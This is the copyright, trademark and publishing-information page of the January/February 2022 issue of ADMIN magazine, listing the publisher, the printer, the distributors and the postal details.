Copyright and Trademarks © 2022 Linux New Media USA, LLC. No material may be reproduced in any form whatsoever in whole or in part without the written permission of the publishers. It is assumed that all correspondence sent, for example, letters, email, faxes, photographs, articles, drawings, are supplied for publication or license to third parties on a non-exclusive worldwide basis by Linux New Media unless otherwise stated in writing.

All brand or product names are trademarks of their respective owners. Contact us if we haven't credited your copyright; we will always correct any oversight.

Printed in Nuremberg, Germany by hofmann infocom GmbH. Distributed by Seymour Distribution Ltd, United Kingdom.

ADMIN (ISSN 2045-0702) is published bimonthly by Linux New Media USA, LLC, 4840 Bob Billings Parkway, Ste 104, Lawrence, KS 66049, USA. January/February 2022. Periodicals Postage paid at Lawrence, KS. Ride-Along Enclosed. POSTMASTER: Please send address changes to ADMIN, 4840 Bob Billings Parkway, Ste 104, Lawrence, KS 66049, USA.

Published in Europe by: Sparkhaus Media GmbH, Bialasstr. 1a, 85625 Glonn, Germany.
